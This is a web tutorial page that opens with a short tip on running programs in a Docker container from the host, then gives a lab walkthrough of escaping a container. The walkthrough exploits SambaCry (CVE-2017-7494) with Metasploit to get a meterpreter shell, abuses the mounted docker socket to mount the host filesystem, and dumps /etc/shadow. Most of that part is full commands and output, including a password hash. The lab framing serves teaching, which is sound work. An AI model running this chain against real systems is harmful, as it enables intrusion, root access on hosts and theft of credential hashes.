Execute the shell or program inside the Docker container on the host

In order to avoid repeatedly entering the Docker container to operate, a series of instructions inside the container can be completed by the host machine.

Execute the "printer" executable program in the /usr directory of the centos container (named centos-1) on the host machine (the author's host is Windows 7), and the output of the program is to print "123".

C:\Users\Administrator>docker exec -it centos-1 /bin/bash -c "cd usr && ./printer" 123

success.

Additional knowledge: Using insecure deployment of Docker containers to gain host permissions

Preface

There are many ways to abuse containers and escape. This article will discuss the most basic one, which is to abuse the docker socket to escape the container and execute code as root on the host.

Experimental environment setup

Since we will be using containers, you must have docker installed.

Creating a network

First, we create a docker network where we will create the container:

docker network create pwnage

Start the vulnerable container

In this example, I will use a container affected by the SambaCry vulnerability (CVE-2017-7494). For more information about the vulnerability, see opsxcq/exploit-CVE-2017-7494.

This vulnerability allows you to execute remote code in the Samba server. We will add the docker socket to the container. Here is an example of abusing docker.

docker run --rm -it \
    --name vulnerable \
    --network-pwnage \
    -v '/var/run/docker.sock:/var/run/docker.sock' \
    vulnerables/cve-2017-7494

Start attack aircraft

After the lab environment is set up, we need to add the attacker's host to the network. There is an exploit available in the Samba Cry repository, but I will be using Metasploit here as it is easier to upload what I need.

I have built an image for this, just run the bellow command and everything will run as needed for the lab environment:

docker run --rm -it \
    --network-pwnage \
    -v '/usr/bin/docker:/docker:ro' \
    strm/metasploit

After loading is complete, you will see the following interface.

Attack Exploitation

Information Collection

Information gathering is an essential part of any attack or test. So, let’s first ping the vulnerable container to check the current connectivity.

ping -c 2 vulnerable

If everything went well, you should see the following output.

msf5 > ping -c 2 vulnerable 
[*] exec: ping -c 2 vulnerable 
 
PING vulnerable (172.20.0.2) 56(84) bytes of data.
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=1 ttl=64 time=0.120 ms
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=2 ttl=64 time=0.097 ms
 
--- vulnerable ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1009ms
rtt min/avg/max/mdev = 0.097/0.108/0.120/0.015 ms

We then do a basic smb share enumeration:

use auxiliary/scanner/smb/smb_enumshares
set rhosts vulnerable
run

The output is as follows:

msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts vulnerable
rhosts => vulnerable
msf5 auxiliary(scanner/smb/smb_enumshares) > run
 
[+] 172.20.0.2:139 - data - (DS) Data
[+] 172.20.0.2:139 - IPC$ - (I) IPC Service (Crying samba)
[*] vulnerable: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As you can see, there is a share named data in this samba server.

Get a shell

The next step is to run the exploit against the host machine to get a shell. In Metasploit, the vulnerability is named is_known_pipename and is located at exploit/linux/samba/is_known_pipename.

Run the bellow command to attack the host:

use exploit/linux/samba/is_known_pipename
set RHOST vulnerable
set RPORT 445
set payload linux/x64/meterpreter/bind_tcp
set TARGET 3
set SMB_FOLDER data
set SMBUser sambacry
set SMBPass nosambanocry
exploit

If everything goes well, you will get a meterpreter shell. as follows:

msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > set RHOST vulnerable
RHOST => vulnerable
msf5 exploit(linux/samba/is_known_pipename) > set RPORT 445
RPORT => 445
msf5 exploit(linux/samba/is_known_pipename) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(linux/samba/is_known_pipename) > set TARGET 3
TARGET => 3
msf5 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER data
SMB_FOLDER => data
msf5 exploit(linux/samba/is_known_pipename) > set SMBUser sambacry
SMBUser => sambacry
msf5 exploit(linux/samba/is_known_pipename) > set SMBPass nosambanocry
SMBPass => nosambanocry
msf5 exploit(linux/samba/is_known_pipename) > exploit
 
[*] vulnerable:445 - Using location \\vulnerable\data\ for the path
[*] vulnerable:445 - Retrieving the remote path of the share 'data'
[*] vulnerable:445 - Share 'data' has server-side path '/data
[*] vulnerable:445 - Uploaded payload to \\vulnerable\data\shyyEPPk.so
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using \\PIPE\/data/shyyEPPk.so...
[-] vulnerable:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using /data/shyyEPPk.so...
[-] vulnerable:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Started bind TCP handler against vulnerable:4444
[*] Sending stage (816260 bytes) to vulnerable
 
meterpreter >

Privilege Escalation

We will escalate privileges by abusing the docker socket available inside the container. Since Docker runs as root on the host machine, it also has root permissions. We can abuse this to perform multiple actions. For example, using the --privileged option can provide us with many extended functions. The following is the explanation text extracted from the Docker official documentation:

By default, Docker containers have no privileges, for example, you cannot start a container within a container. This is because by default containers cannot access any other devices. But by being "privileged", the container has the ability to access any other device. When the operator executes docker run --privileged, Docker will have access to all devices on the host. At the same time, Docker will also make some settings in apparmor or selinux so that the container can easily access devices running outside the container.

You can access devices using the --device option. But in this example, I will map the toor file system (/) into the container and access it.

Since there is no docker client in this container, the next thing we need to do is to set up the docker client and its dependencies in the target container. You can do all of this by simply running the following command.

upload /docker /docker
upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
chmod 777 /docker
chmod +x /docker
meterpreter > upload /docker /docker
[*] uploading : /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] uploaded : /docker -> /docker
meterpreter > upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploading: /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] Uploaded -1.00 B of 38.47 KiB (-0.0%): /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploaded : /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
meterpreter > chmod 777 /docker
meterpreter > chmod +x /docker
meterpreter >

Now, we can use docker to access the file system on the host machine. \

execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"

Let's dump the hash of the local user. The output is as follows:

meterpreter > execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"
Process 113 created.
Channel 13 created.
root:$1$UFKdtFGw$qp29y1qGWit/vnvIG0uSr1:17488:0:99999:7:::
daemon:*:17488:0:99999:7:::
bin:*:17488:0:99999:7:::
sys:*:17488:0:99999:7:::
sync:*:17488:0:99999:7:::
games:*:17488:0:99999:7:::
man:*:17488:0:99999:7:::
lp:*:17488:0:99999:7:::
mail:*:17488:0:99999:7:::
news:*:17488:0:99999:7:::

The above article on how to execute shell or program inside a docker container on the host is all I have to share with you. I hope it can give you a reference, and I also hope that you will support 123WORDPRESS.COM.

You may also be interested in:

Docker enables seamless calling of shell commands between container and host
Solution to the Docker container not having permission to write to the host directory
Solution to the Docker container being unable to access the host port
Call and execute host docker operations in docker container
Detailed explanation of how to solve the problem that the docker container cannot access the host machine through IP
How to use Docker container to access host network
Solve the problem of 8 hours difference between docker container and host machine

<<: 5 commonly used objects in JavaScript

>>: A complete list of meta tag settings for mobile devices

Vue commonly used high-order functions and comprehensive examples

Blog

Example of CSS3 to achieve div sliding in and out from bottom to top

Blog

MySQL statement to get all dates or months in a specified time period (without setting stored procedures or adding tables)

Blog

Several methods of horizontal and vertical centering of div content using css3 flex

Recommend

Tomcat exception solution (Invalid character found in the request target. The valid characters are defined in RFC 7230 and RFC 3986)

1. Scenario display The tomcat log occasionally r...

Execute the shell or program inside the Docker container on the host

Vue commonly used high-order functions and comprehensive examples

Example of CSS3 to achieve div sliding in and out from bottom to top

MySQL statement to get all dates or months in a specified time period (without setting stored procedures or adding tables)

Several methods of horizontal and vertical centering of div content using css3 flex

Detailed explanation of CocosCreator Huarongdao digital puzzle

MySQL database development specifications [recommended]

Solution to the problem that crontab output redirection does not take effect in Linux

Detailed introduction to deploying k8s cluster on centos7 system

jQuery implements breathing carousel

Operations of communication between Docker containers and external network communication

Recommend

Tomcat exception solution (Invalid character found in the request target. The valid characters are defined in RFC 7230 and RFC 3986)

The submit event of the form does not respond

What are the attributes of the JSscript tag

Detailed explanation of the concept of docker container layers

How to separate static and dynamic state by combining Apache with Tomcat

MySQL paging analysis principle and efficiency improvement

Solve the problem of docker container exiting immediately after starting

How to bind Docker container to external IP and port

Detailed explanation of the pitfalls of DTS caused by the timestamp and datetime time zone issues in MySQL

Detailed explanation of JavaScript data types

A brief discussion on HTML doctype and encoding

How to use the Marquee tag in XHTML code

A brief analysis of the differences between undo, redo and binlog in MySQL

HTML page adaptive width table

MySQL password is correct but cannot log in locally -1045